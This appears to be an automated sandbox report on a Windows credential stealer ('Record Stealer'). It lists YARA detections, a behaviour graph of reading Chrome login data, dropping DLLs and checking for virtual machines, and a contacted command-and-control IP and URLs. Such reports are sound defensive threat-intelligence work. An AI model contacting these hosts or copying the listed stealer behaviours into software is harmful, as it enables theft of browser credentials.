Source: C:\Users\user\Desktop\VASkmEQ4iU.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality
barindex
Yara detected Record Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.VASkmEQ4iU.exe.1a1aca3.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.VASkmEQ4iU.exe.1a1aca3.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.460242946.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.470300145.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.458303380.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.468368220.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446552049.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.466555483.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446585684.0000000001A57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.451981881.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446651246.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446518544.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.481057037.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.454619131.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.452125462.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.446733215.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.455974232.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.469287857.0000000001A2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 652389 Sample: VASkmEQ4iU.exe Startdate: 26/06/2022 Architecture: WINDOWS Score: 100 20 Snort IDS alert for network traffic 2->20 22 Multi AV Scanner detection for submitted file 2->22 24 Yara detected Record Stealer 2->24 26 3 other signatures 2->26 5 VASkmEQ4iU.exe 24 2->5         started        process3 dnsIp4 18 185.62.56.113, 49758, 80 SNELNL Netherlands 5->18 10 C:\Users\user\AppData\...\vcruntime140.dll, PE32 5->10 dropped 12 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 5->12 dropped 14 C:\Users\user\AppData\LocalLow\softokn3.dll, PE32 5->14 dropped 16 4 other files (none is malicious) 5->16 dropped 28 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 5->28 30 Query firmware table information (likely to detect VMs) 5->30 32 Tries to harvest and steal browser information (history, passwords, etc) 5->32 34 4 other signatures 5->34 file5 signatures6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.62.56.113
 unknown Netherlands
62370 SNELNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.62.56.113/ true
  • Avira URL Cloud: safe
 unknown
http://185.62.56.113/c5e0a800e57a53b399120e5a97b50daa true
  • Avira URL Cloud: safe
 unknown